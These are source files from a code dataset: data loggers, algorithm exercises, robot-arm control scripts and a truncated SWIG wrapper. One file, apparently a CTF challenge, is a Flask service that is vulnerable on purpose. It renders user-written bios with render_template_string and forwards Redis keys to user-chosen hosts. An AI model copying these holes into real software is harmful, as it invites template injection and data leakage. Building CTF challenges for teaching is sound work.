2019-12-30T14:52:02.000Z
|
2020-01-04T11:41:08.000Z
|
handledata.py
|
bioPunkKitchen/climate.local
|
ccd29da3d84542d5f9c73a5d75bc3ceefeef1f08
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import datetime
import time
import os
import matplotlib.pyplot as plt
import matplotlib.dates as md
import numpy as np
class handle_data:
data_file = "./data/data.log"
data_list = []
def __init__(self):
pass
def insert_data(self, timestamp, temp, state_onoff, state_light, state_cooling, state_heating):
"""
Insert data to log file and add timestamp.
"""
if state_onoff == 'on':
state_onoff = 1
else:
state_onoff = 0
if state_light == 'on':
state_light = 1
else:
state_light = 0
if state_cooling == 'on':
state_cooling = 1
else:
state_cooling = 0
if state_heating == 'on':
state_heating = 1
else:
state_heating = 0
data_string = str(timestamp) + ";" + str(temp) + ";" + str(state_onoff) + ";" + str(state_light) + ";" + str(state_cooling) + ";" + str(state_heating) + "\n"
self.data_list.append(data_string)
#print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tInserted data: data_list.append len=", len(self.data_list))
return
def append_data_to_file(self):
"""
Append data to log file.
"""
try:
with open(self.data_file, "a") as outfile:
for entry in self.data_list:
outfile.write(str(entry))
except IOError:
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tIOError opening data.log for appending data")
self.data_list.clear()
return
def clean_file(self):
"""
Clean log file in order to reset measurement.
"""
try:
with open(self.data_file, "w") as outfile:
outfile.write("Timestamp; Temp; State_onoff; State_light; State_cooling; State_heating\n")
except IOError:
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tIOError opening data.log for writing")
return
def update_graph(self, path):
"""
Generate or update graph from data file.
"""
lines = sum(1 for _ in open(self.data_file))
if lines > 1:
data=np.genfromtxt(self.data_file, delimiter=';', skip_header=1, names=['Time', 'Temp', 'Onoff', 'Light', 'Cooling', 'Heating'], dtype=([('Time', '<U30'), ('Temp', '<f8'), ('Onoff', '<f8'), ('Light', '<f8'), ('Cooling', '<f8'), ('Heating', '<f8')]))
fig, ax1 = plt.subplots()
if data['Temp'].shape:
if data['Temp'].shape[0] > 120:
ax1.plot(data['Temp'][((data['Temp'].shape[0])-120):(data['Temp'].shape[0])], color = 'r', label = 'Temp.')
else:
ax1.plot(data['Temp'], color = 'r', label = 'Temp.')
else:
ax1.plot(data['Temp'], color = 'r', label = 'Temp.')
ax1.set_xlim([0,120])
ax1.set_xticks([0,30,60,90,120])
ax1.set_ylabel('Temp (°C)', color='r')
ax1.tick_params('y', colors='r')
yt=range(-1,41,1)
ax1.set_yticks(yt, minor=True)
ax1.set_xlabel('last two hours (scale:min.)')
"""
ax2 = ax1.twinx()
ax2.plot(data['Light'], color = 'g', label = 'Light', marker = 'o')
ax2.plot(data['Onoff'], color = 'y', label = 'Onoff', marker = '*')
ax2.plot(data['Heating'], color = 'r', label = 'Heating')
ax2.plot(data['Cooling'], color = 'b', label = 'Cooling')
ax2.set_ylabel('Light (on=1/off=0)', color='b')
ax2.tick_params('y', colors='b')
ax2.set_yticks([0,1], minor=False)
"""
fig.tight_layout()
#plt.legend(['Temp. inside'], loc='upper left')
plt.savefig(path, bbox_inches='tight')
plt.close(fig)
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tGraph generated/updated.")
else:
#os.remove(path)
#os.mknod(path)
#os.chmod(path, 0o644)
try:
with open(path, "w") as outfile:
outfile.write("")
except IOError:
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tIOError: Could not generate empty graph file.")
print(datetime.datetime.now().strftime('%Y-%m-%d_%a_%H:%M:%S.%f'), "\tNo data, graph is empty.")
return
# Test:
if __name__ == '__main__':
hd = handle_data()
#hd.clean_file()
hd.update_graph('./static/data_log.png')
| 30.015267 | 252 | 0.625127 |
73722b13a366409a78c447bdbc55cbb010f2c490
| 568 |
py
|
Python
|
src/visuanalytics/tests/analytics/transform/transform_test_helper.py
|
mxsph/Data-Analytics
|
c82ff54b78f50b6660d7640bfee96ea68bef598f
|
[
"MIT"
] | 3 |
2020-08-24T19:02:09.000Z
|
2021-05-27T20:22:41.000Z
|
src/visuanalytics/tests/analytics/transform/transform_test_helper.py
|
mxsph/Data-Analytics
|
c82ff54b78f50b6660d7640bfee96ea68bef598f
|
[
"MIT"
] | 342 |
2020-08-13T10:24:23.000Z
|
2021-08-12T14:01:52.000Z
|
src/visuanalytics/tests/analytics/transform/transform_test_helper.py
|
visuanalytics/visuanalytics
|
f9cce7bc9e3227568939648ddd1dd6df02eac752
|
[
"MIT"
] | 8 |
2020-09-01T07:11:18.000Z
|
2021-04-09T09:02:11.000Z
|
from visuanalytics.analytics.control.procedures.step_data import StepData
from visuanalytics.analytics.transform.transform import transform
def prepare_test(values: list, data, expected_data: dict, config=None):
if config is None:
config = {}
step_data = StepData(config, "0", 0)
step_data.insert_data("_req", data, {})
transform({"transform": values}, step_data)
# removed Temporary set data
step_data.data.pop("_conf")
step_data.data.pop("_pipe_id")
step_data.data.pop("_job_id")
return step_data.data, expected_data
| 29.894737 | 73 | 0.721831 |
83b9dae35ff849de97a8ab5c1b5b328eee4bf2a8
| 517 |
py
|
Python
|
08.Graph/Kruskal.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 1 |
2021-11-21T06:03:06.000Z
|
2021-11-21T06:03:06.000Z
|
08.Graph/Kruskal.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 2 |
2021-10-13T07:21:09.000Z
|
2021-11-14T13:53:08.000Z
|
08.Graph/Kruskal.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | null | null | null |
def pprint(arr):
for line in arr:
print(line)
# 5 7
# 0 1 1
# 0 2 3
# 1 2 3
# 1 3 6
# 2 3 4
# 2 4 2
# 3 4 5
import sys
import heapq as hq
N, M = map(int, sys.stdin.readline().split(" "))
W = [[float('inf')] * N for _ in range(N)]
h = []
for _ in range(M):
i, j, w = map(int, sys.stdin.readline().split(" "))
hq.heappush(h, (w, i, j))
print(h)
def Kruskal(heap, source):
answer = []
visited = []
while heap:
w, i, j = hq.heappop(heap)
return answer
print(Kruskal(h, 0))
| 16.15625 | 55 | 0.537718 |
83e3deec67e89aa7e42ab0f38a20a3246b563ad9
| 1,551 |
py
|
Python
|
official/cv/ADNet/export_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/ADNet/export_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/ADNet/export_model.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import argparse
import numpy as np
from src.options.general import opts
from src.models.ADNet import adnet
from mindspore import Tensor, export, context
parser = argparse.ArgumentParser(
description='ADNet test')
parser.add_argument('--weight_file', default='', type=str, help='The pretrained weight file')
parser.add_argument('--device_target', type=str, default="Ascend", choices=['Ascend', 'GPU', 'CPU'])
parser.add_argument('--target_device', type=int, default=0)
args = parser.parse_args()
context.set_context(device_target=args.device_target, mode=context.PYNATIVE_MODE, device_id=args.target_device)
opts['num_videos'] = 1
net, domain_specific_nets = adnet(opts, trained_file=args.weight_file)
input_ = np.random.uniform(0.0, 1.0, size=[128, 3, 112, 112]).astype(np.float32)
export(net, Tensor(input_), file_name='ADNet', file_format='MINDIR')
print('export finished')
| 43.083333 | 111 | 0.728562 |
86024a0f256f012bd58b4d8e9b5de4b21cc1702d
| 1,024 |
py
|
Python
|
stat_ip_in_hash_woker_table.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
stat_ip_in_hash_woker_table.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
stat_ip_in_hash_woker_table.py
|
ligang945/pyMisc
|
3107c80f7f53ffc797b289ec73d1ef4db80f0b63
|
[
"MIT"
] | null | null | null |
def sortedDict(adict):
keys = adict.keys()
keys.sort()
return map(adict.get, keys)
ipint2str = lambda x: '.'.join([str(x/(256**i)%256) for i in range(3,-1,-1)])
ipstr2int = lambda x:sum([256**j*int(i) for j,i in enumerate(x.split('.')[::-1])])
src_ip = dict()
dst_ip = dict()
i =0
with open('hash_key_value') as f:
for line in f:
i += 1
# if i==8424720:
if i==328:
break
ip = int(line.split(',')[0], 16)
dir = int(line.split(',')[1])
if dir==1:
src_ip.setdefault(ip, dir)
elif dir ==0:
dst_ip.setdefault(ip, dir)
print len(src_ip)
for key in src_ip:
print ipint2str(key)+' ' ,
print '======='
print len(dst_ip)
for key in dst_ip:
print ipint2str(key)+' ' ,
# keys = src_ip.items()
# keys.sort()
# for key in keys:
# print ipint2str(key[0])
# keys = dst_ip.items()
# keys.sort()
# for key in keys:
# print ipint2str(key[0])
| 20.078431 | 82 | 0.512695 |
860663bf7fc7f279ff0aaf05a3df989c0b80600b
| 2,431 |
py
|
Python
|
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex07_water_jugs.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex07_water_jugs.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
Python/zzz_training_challenge/Python_Challenge/solutions/ch07_recursion_advanced/solutions/ex07_water_jugs.py
|
Kreijeck/learning
|
eaffee08e61f2a34e01eb8f9f04519aac633f48c
|
[
"MIT"
] | null | null | null |
# Beispielprogramm für das Buch "Python Challenge"
#
# Copyright 2020 by Michael Inden
def solve_water_jugs(size1, size2, desired_liters):
return __solve_water_jugs_rec(size1, size2,
desired_liters, 0, 0, {})
def __solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1, current_jug2, already_tried):
if is_solved(current_jug1, current_jug2, desired_liters):
print("Solved Jug 1:", current_jug1, " / 2:", current_jug2)
return True
key = (current_jug1, current_jug2)
if not key in already_tried:
already_tried[key] = True
# Probiere alle 6 Varianten aus
print("Jug 1:", current_jug1, " / 2: ", current_jug2)
min_2_1 = min(current_jug2, (size1 - current_jug1))
min_1_2 = min(current_jug1, (size2 - current_jug2))
result = __solve_water_jugs_rec(size1, size2, desired_liters,
0, current_jug2, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1, 0, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
size1, current_jug2, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1, size2, already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1 + min_2_1,
current_jug2 - min_2_1,
already_tried) or \
__solve_water_jugs_rec(size1, size2, desired_liters,
current_jug1 - min_1_2,
current_jug2 + min_1_2,
already_tried)
# Memoization:
already_tried[key] = result
return result
return False
def is_solved(current_jug1, current_jug2, desired_liters):
return (current_jug1 == desired_liters and current_jug2 == 0) or \
(current_jug2 == desired_liters and current_jug1 == 0)
def main():
print(solve_water_jugs(4, 3, 2))
print(solve_water_jugs(4, 4, 2))
#print(solveWaterJugs(5, 2, 4))
if __name__ == "__main__":
main()
| 37.4 | 80 | 0.559441 |
860804e29db65321937c10951cae50769822d370
| 641 |
py
|
Python
|
1014 Trie Tree/test.py
|
SLAPaper/hihoCoder
|
3f64d678c5dd46db36345736eb56880fb2d2c5fe
|
[
"MIT"
] | null | null | null |
1014 Trie Tree/test.py
|
SLAPaper/hihoCoder
|
3f64d678c5dd46db36345736eb56880fb2d2c5fe
|
[
"MIT"
] | null | null | null |
1014 Trie Tree/test.py
|
SLAPaper/hihoCoder
|
3f64d678c5dd46db36345736eb56880fb2d2c5fe
|
[
"MIT"
] | null | null | null |
# generate 900k word and 900k query to test the runtime
from main import TrieTree
import time
import random
vocal = list(range(26))
trie = TrieTree()
words = [[random.choice(vocal) for _ in range(random.randrange(1, 11))] for _ in range(100000)]
queries = [[random.choice(vocal) for _ in range(random.randrange(1, 11))] for _ in range(100000)]
begin = time.time()
for word in words:
trie.insert(word)
insert_end = time.time()
for query in queries:
trie.query(query)
end = time.time()
print("insert time used:", insert_end - begin, 's')
print("query time used:", end - insert_end, 's')
print("time used:", end - begin, 's')
| 22.103448 | 97 | 0.692668 |
f7ff646590489831f35fa9fe7ca9c0fe9f2f76be
| 592 |
py
|
Python
|
ProjectEuler_plus/euler_042.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_042.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
ProjectEuler_plus/euler_042.py
|
byung-u/HackerRank
|
4c02fefff7002b3af774b99ebf8d40f149f9d163
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import sys
from math import sqrt
# (n * (n + 1)) / 2 -> n ** 2 + n - (2 * x)
# Solved with quadratic equation
# https://en.wikipedia.org/wiki/Quadratic_equation
for _ in range(int(input().strip())):
t = int(input().strip())
d = (sqrt(4 * 2 * t + 1) - 1)
if d.is_integer():
print(int(d) // 2)
else:
print(-1)
def e42():
for _ in range(int(input().strip())):
n = int(input().strip())
root = int(sqrt(2 * n))
if (root * (root + 1)) // 2 == n:
print(root)
else:
print(-1)
| 21.925926 | 52 | 0.489865 |
79181888e71b95f21231a74673bce1df5f5dad06
| 1,058 |
py
|
Python
|
jburt/mask.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/mask.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
jburt/mask.py
|
jbburt/jburt
|
7745491214ef2b665ca8d1fc526bc802a36985ff
|
[
"MIT"
] | null | null | null |
from typing import List
import numpy as np
def mask_nan(arrays: List[np.ndarray]) -> List[np.ndarray]:
"""
Drop indices from equal-sized arrays if the element at that index is NaN in
any of the input arrays.
Parameters
----------
arrays : List[np.ndarray]
list of ndarrays containing NaNs, to be masked
Returns
-------
List[np.ndarray]
masked arrays (free of NaNs)
Notes
-----
This function find the indices where one or more elements is NaN in one or
more of the input arrays, then drops those indices from all arrays.
For example:
>> a = np.array([0, 1, np.nan, 3])
>> b = np.array([np.nan, 5, np.nan, 7])
>> c = np.array([8, 9, 10, 11])
>> mask_nan([a, b, c])
[array([ 1., 3.]), array([ 5., 7.]), array([ 9, 11])]
"""
n = arrays[0].size
assert all(a.size == n for a in arrays[1:])
mask = np.array([False] * n)
for arr in arrays:
mask = np.logical_or(mask, np.isnan(arr))
return [arr[np.where(~mask)[0]] for arr in arrays]
| 27.128205 | 79 | 0.581285 |
e3eb6d0f0d638a2beae2a17150b8764d8ef995b7
| 2,946 |
py
|
Python
|
vb_simulation_pkgs/example_pkgs/pkg_moveit_examples/scripts/node_eg2_predefined_pose.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | 1 |
2021-07-13T07:05:29.000Z
|
2021-07-13T07:05:29.000Z
|
vb_simulation_pkgs/example_pkgs/pkg_moveit_examples/scripts/node_eg2_predefined_pose.py
|
TejasPhutane/Eyantra-2021-Vargi-Bots
|
ab84a1304101850be8c0f69cfe6de70d53c33189
|
[
"MIT"
] | 1 |
2021-06-05T07:58:03.000Z
|
2021-06-05T07:58:03.000Z
|
vb_simulation_pkgs/example_pkgs/pkg_moveit_examples/scripts/node_eg2_predefined_pose.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
import rospy
import sys
import copy
import moveit_commander
import moveit_msgs.msg
import geometry_msgs.msg
import actionlib
class Ur5Moveit:
# Constructor
def __init__(self, arg_robot_name):
rospy.init_node('node_eg2_predefined_pose', anonymous=True)
self._robot_ns = '/' + arg_robot_name
self._planning_group = "manipulator"
self._commander = moveit_commander.roscpp_initialize(sys.argv)
self._robot = moveit_commander.RobotCommander(robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._scene = moveit_commander.PlanningSceneInterface(ns=self._robot_ns)
self._group = moveit_commander.MoveGroupCommander(self._planning_group, robot_description= self._robot_ns + "/robot_description", ns=self._robot_ns)
self._display_trajectory_publisher = rospy.Publisher( self._robot_ns + '/move_group/display_planned_path', moveit_msgs.msg.DisplayTrajectory, queue_size=1)
self._exectute_trajectory_client = actionlib.SimpleActionClient( self._robot_ns + '/execute_trajectory', moveit_msgs.msg.ExecuteTrajectoryAction)
self._exectute_trajectory_client.wait_for_server()
self._planning_frame = self._group.get_planning_frame()
self._eef_link = self._group.get_end_effector_link()
self._group_names = self._robot.get_group_names()
self._box_name = ''
# Current State of the Robot is needed to add box to planning scene
self._curr_state = self._robot.get_current_state()
rospy.loginfo(
'\033[94m' + "Planning Group: {}".format(self._planning_frame) + '\033[0m')
rospy.loginfo(
'\033[94m' + "End Effector Link: {}".format(self._eef_link) + '\033[0m')
rospy.loginfo(
'\033[94m' + "Group Names: {}".format(self._group_names) + '\033[0m')
rospy.loginfo('\033[94m' + " >>> Ur5Moveit init done." + '\033[0m')
def go_to_predefined_pose(self, arg_pose_name):
rospy.loginfo('\033[94m' + "Going to Pose: {}".format(arg_pose_name) + '\033[0m')
self._group.set_named_target(arg_pose_name)
plan = self._group.plan()
goal = moveit_msgs.msg.ExecuteTrajectoryGoal()
goal.trajectory = plan
self._exectute_trajectory_client.send_goal(goal)
self._exectute_trajectory_client.wait_for_result()
rospy.loginfo('\033[94m' + "Now at Pose: {}".format(arg_pose_name) + '\033[0m')
# Destructor
def __del__(self):
moveit_commander.roscpp_shutdown()
rospy.loginfo(
'\033[94m' + "Object of class Ur5Moveit Deleted." + '\033[0m')
def main():
ur5 = Ur5Moveit(sys.argv[1])
while not rospy.is_shutdown():
ur5.go_to_predefined_pose("straightUp")
rospy.sleep(2)
ur5.go_to_predefined_pose("allZero")
rospy.sleep(2)
del ur5
if __name__ == '__main__':
main()
| 37.291139 | 163 | 0.681942 |
5414c4d1cd6ab405e144265b135b1ae64b919a77
| 2,596 |
py
|
Python
|
web/MicroservicesAsAservice/src/notes/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/MicroservicesAsAservice/src/notes/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
web/MicroservicesAsAservice/src/notes/app.py
|
NoXLaw/RaRCTF2021-Challenges-Public
|
1a1b094359b88f8ebbc83a6b26d27ffb2602458f
|
[
"MIT"
] | null | null | null |
from flask import Flask, request, jsonify, render_template_string
import redis
import requests
import re
import json
import sys
app = Flask(__name__)
@app.route('/getid/<username>')
def getid(username):
red = redis.Redis(host="redis_users")
return red.get(username).decode()
@app.route('/useraction', methods=["POST"])
def useraction():
mode = request.form.get("mode")
username = request.form.get("username")
if mode == "register":
r = requests.get('http://redis_userdata:5000/adduser')
port = int(r.text)
red = redis.Redis(host="redis_users")
red.set(username, port)
return ""
elif mode == "adddata":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
requests.post(f"http://redis_userdata:5000/putuser/{port}", json={
request.form.get("key"): request.form.get("value")
})
return ""
elif mode == "getdata":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
r = requests.get(f"http://redis_userdata:5000/getuser/{port}")
return jsonify(r.json())
elif mode == "bioadd":
bio = request.form.get("bio")
bio = bio.replace(".", "").replace("_", "").\
replace("{", "").replace("}", "").\
replace("(", "").replace(")", "").\
replace("|", "")
bio = re.sub(r'\[\[([^\[\]]+)\]\]', r'{{data["\g<1>"]}}', bio)
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
requests.post(f"http://redis_userdata:5000/bio/{port}", json={
"bio": bio
})
return ""
elif mode == "bioget":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
r = requests.get(f"http://redis_userdata:5000/bio/{port}")
return r.text
elif mode == "keytransfer":
red = redis.Redis(host="redis_users")
port = red.get(username).decode()
red2 = redis.Redis(host="redis_userdata",
port=int(port))
red2.migrate(request.form.get("host"),
request.form.get("port"),
[request.form.get("key")],
0, 1000,
copy=True, replace=True)
return ""
@app.route("/render", methods=["POST"])
def render_bio():
data = request.json.get('data')
if data is None:
data = {}
return render_template_string(request.json.get('bio'), data=data)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000)
| 33.282051 | 74 | 0.552003 |
58183b1abecb86537c0a52b35966e7d8ef3e9a5f
| 5,775 |
py
|
Python
|
Agent5_a_0_5_knots_512_d_0_02/step_node_Agent6_rewards.py
|
schigeru/Bachelorarbeit_Code
|
261b2552221f768e7022abc60a4e5a7d2fedbbae
|
[
"MIT"
] | null | null | null |
Agent5_a_0_5_knots_512_d_0_02/step_node_Agent6_rewards.py
|
schigeru/Bachelorarbeit_Code
|
261b2552221f768e7022abc60a4e5a7d2fedbbae
|
[
"MIT"
] | null | null | null |
Agent5_a_0_5_knots_512_d_0_02/step_node_Agent6_rewards.py
|
schigeru/Bachelorarbeit_Code
|
261b2552221f768e7022abc60a4e5a7d2fedbbae
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import math
import os
import numpy as np
import time
import sys
import copy
import rospy
import moveit_msgs.msg
import geometry_msgs.msg
import random
import csv
from sensor_msgs.msg import JointState
from gazebo_msgs.msg import LinkStates
from gazebo_msgs.msg import LinkState
from std_msgs.msg import Float64
from std_msgs.msg import String
from sensor_msgs.msg import Joy
import moveit_commander
from panda_rl.srv import StepAction, StepActionResponse
group_name = "panda_arm_hand"
move_group = moveit_commander.MoveGroupCommander(group_name)
quat_goal = np.array([1, 0, 0.0075, 0])
def vector2points(v, u):
v = np.array(v)
u = np.array(u)
vector = u - v
vector = np.round(vector, 5)
return vector
def get_hand_position():
msg = rospy.wait_for_message('/gazebo/link_states', LinkStates)
hand_positionx = (msg.pose[9].position.x + msg.pose[10].position.x) / 2
hand_positiony = (msg.pose[9].position.y + msg.pose[10].position.y) / 2
hand_positionz = (msg.pose[9].position.z + msg.pose[10].position.z) / 2
hand_position = [hand_positionx, hand_positiony, hand_positionz]
hand_position = np.round(hand_position, 5)
return hand_position
def get_hand_orientation():
msg = rospy.wait_for_message('/gazebo/link_states', LinkStates)
hand_orientation_x = (msg.pose[9].orientation.x + msg.pose[10].orientation.x) / 2
hand_orientation_y = (msg.pose[9].orientation.y + msg.pose[10].orientation.y) / 2
hand_orientation_z = (msg.pose[9].orientation.z + msg.pose[10].orientation.z) / 2
hand_orientation_w = (msg.pose[9].orientation.w + msg.pose[10].orientation.w) / 2
hand_orientation = [hand_orientation_x, hand_orientation_y, hand_orientation_z, hand_orientation_w]
hand_orientation = np.round(hand_orientation, 5)
return hand_orientation
def goal_distance(x, y):
x = np.array(x)
y = np.array(y)
distance = np.linalg.norm(x-y)
distance = np.round(distance, 5)
return distance
def take_action(msg):
done = False
goal = msg.goal
joint_state = move_group.get_current_joint_values()
joint_state[0] = joint_state[0] + (msg.action[0] / 20)
joint_state[1] = joint_state[1] + (msg.action[1] / 20)
joint_state[2] = joint_state[2] + (msg.action[2] / 20)
joint_state[3] = joint_state[3] + (msg.action[3] / 20)
joint_state[4] = joint_state[4] + (msg.action[4] / 20)
joint_state[5] = joint_state[5] + (msg.action[5] / 20)
joint_state[7] = 0.04
joint_state[8] = 0.04
if joint_state[0] < joint1_threshold_min or joint_state[0] > joint1_threshold_max \
or joint_state[1] < joint2_threshold_min or joint_state[1] > joint2_threshold_max \
or joint_state[2] < joint3_threshold_min or joint_state[2] > joint3_threshold_max \
or joint_state[3] < joint4_threshold_min or joint_state[3] > joint4_threshold_max \
or joint_state[4] < joint5_threshold_min or joint_state[4] > joint5_threshold_max \
or joint_state[5] < joint6_threshold_min or joint_state[5] > joint6_threshold_max:
hand_position = get_hand_position()
vector = vector2points(hand_position, goal)
obs = joint_state[0:7]
obs = np.round(obs, 5)
obs = np.append(obs, vector)
done = True
reward = -50
return StepActionResponse(obs=obs, reward=reward, done=done)
else:
move_group.go(joint_state, wait=True)
move_group.stop()
joint_state = move_group.get_current_joint_values()
obs = joint_state[0:7]
obs = np.round(obs, 5)
hand_position = get_hand_position()
quat = get_hand_orientation()
quat_reward = np.linalg.norm(quat_goal - quat)
d = goal_distance(hand_position, goal)
vector = vector2points(hand_position, goal)
z = hand_position[2] - goal[2]
obs = np.append(obs, vector)
if d < 0.02 and z > 0:
reward = 0
print("Action: ", msg.action)
print("Handpos: ", hand_position)
print("Goal: ", goal)
print("Observation ", obs)
print("reward target reached: ", reward)
done = True
group_name_gripper = "hand"
move_group_gripper = moveit_commander.MoveGroupCommander(group_name_gripper)
joint_values = move_group_gripper.get_current_joint_values()
joint_values[0] = 0.02
joint_values[1] = 0.02
move_group_gripper.go(joint_values, wait=True)
move_group_gripper.stop()
return StepActionResponse(obs=obs, reward=reward, done=done)
elif d > 0.08 and z < 0.05 or z < 0: #Fördert Anfahren von oben durch Bestrafung wenn EE weit weg ist, aber bereits auf ähnlicher Höhe zum Ziel
reward = 5 * (-d - quat_reward)
return StepActionResponse(obs=obs, reward=reward, done=done)
else:
reward = (-d - quat_reward)
#print("Action: ", msg.action)
print("Handpos: ", hand_position)
print("Goal: ", goal)
#print("Observation ", obs)
print("reward: ", reward)
print("Distance", d)
return StepActionResponse(obs=obs, reward=reward, done=done)
joint1_threshold_min = -2.8973
joint2_threshold_min = -1.7628
joint3_threshold_min = -2.8973
joint4_threshold_min = -3.0718
joint5_threshold_min = -2.8973
joint6_threshold_min = -0.0175
joint1_threshold_max = 2.8973
joint2_threshold_max = 1.7628
joint3_threshold_max = 2.8973
joint4_threshold_max = -0.0698
joint5_threshold_max = 2.8973
joint6_threshold_max = 3.7525
rospy.init_node('step_service', anonymous=False)
print("step_nodeaktiv")
s = rospy.Service('step_env', StepAction, take_action)
rospy.spin()
| 35.429448 | 151 | 0.675152 |
3fa22069ae5fe18f29c6332040788c47fba607ea
| 469 |
py
|
Python
|
DataStructures/Stacks/TextEditor.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/Stacks/TextEditor.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
DataStructures/Stacks/TextEditor.py
|
baby5/HackerRank
|
1e68a85f40499adb9b52a4da16936f85ac231233
|
[
"MIT"
] | null | null | null |
#coding:utf-8
N = int(raw_input())
S = ''
stack = [S]
for _ in xrange(N):
s = raw_input()
if s.startswith('1'):
S = ''.join((S, s.split()[-1]))
stack.append(S)
elif s.startswith('2'):
k = int(s.split()[-1])
S = S[:-k]
stack.append(S)
elif s.startswith('3'):
k = int(s.split()[-1])
index = k-1
print S[index]
elif s.startswith('4'):
stack.pop()
S = stack[-1]
| 19.541667 | 39 | 0.447761 |
b79b05e86bdffa34c0cb47c7868d179ea550149c
| 50,505 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/_block.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/_block.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/_block.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 2.0.11
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('__block', [dirname(__file__)])
except ImportError:
import __block
return __block
if fp is not None:
try:
_mod = imp.load_module('__block', fp, pathname, description)
finally:
fp.close()
return _mod
__block = swig_import_helper()
del swig_import_helper
else:
import __block
del version_info
try:
_swig_property = property
except NameError:
